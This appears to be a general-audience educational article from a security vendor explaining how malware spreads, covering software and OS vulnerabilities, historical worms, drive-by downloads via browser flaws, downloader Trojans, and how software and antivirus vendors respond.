Malware Implementation Techniques
Cybercriminals often exploit any vulnerabilities that exist within the operating system (OS) or the application software that’s running on the victim’s computer – so a net worm or Trojan virus can penetrate the victim’s machine and launch itself.
What is a vulnerability?
A vulnerability is effectively an error in the code or the logic of operation within the OS or the application software. Because today’s OSs and applications are very complex and include a lot of functionality, it’s difficult for a vendor’s development team to create software that contains no errors.
Unfortunately, there’s no shortage of virus creators and cybercriminals that are ready to devote considerable effort to investigating how they can benefit from exploiting any vulnerability – before it’s fixed by the vendor issuing a software patch.
Typical vulnerabilities include:
- Application vulnerabilities
The Nimda and Aliz mail worms exploited Microsoft Outlook’s vulnerabilities. When the victim opened an infected message – or even placed their cursor on the message, in the preview window – the worm file launched.
- Operating system (OS) vulnerabilities
CodeRed, Sasser, Slammer and Lovesan (Blaster) are examples of worms that exploited vulnerabilities in the Windows OS – whereas the Ramen and Slapper worms penetrated computers via vulnerabilities in the Linux OS and some Linux applications.
Exploiting Internet browser vulnerabilities
Recently, the distribution of malicious code via web pages has become one of the most popular malware implementation techniques. An infected file and a script program – that exploit the browser’s vulnerability – are placed on a web page. When a user visits the page, the script program downloads the infected file onto the user’s computer – via the browser’s vulnerability – and then launches the file. In order to infect as many machines as possible, the malware creator will use a range of methods to attract victims to the web page:
- Sending spam messages that contain the address of the infected page
- Sending messages via IM systems
- Via search engines – whereby the text placed on an infected page is processed by search engines and the link to the page is then included in search result lists
Clearing the route for Trojan virus infections
Cybercriminals will also use small Trojans that are designed to download and launch larger Trojan viruses. The small Trojan virus will enter the user’s computer – for instance, via a vulnerability – and it will then download and install other malicious components from the Internet. Many of the Trojans will change the browser’s settings – to the browser’s least secure option – in order to make it easier for other Trojans to be downloaded.
Software developers and antivirus vendors respond to the challenge
Unfortunately, the period between the appearance of a new vulnerability and the start of its exploitation by worms and Trojan viruses, tends to become shorter and shorter. This creates challenges for both software vendors and antivirus companies:
- The application or OS vendors have to rectify their mistake as soon as possible – by developing a software patch, testing it and distributing it to the users.
- Antivirus vendors must work rapidly – to release a solution that detects and blocks the files, network packets or whatever other item is used to exploit the vulnerability.
Other articles and links related to malware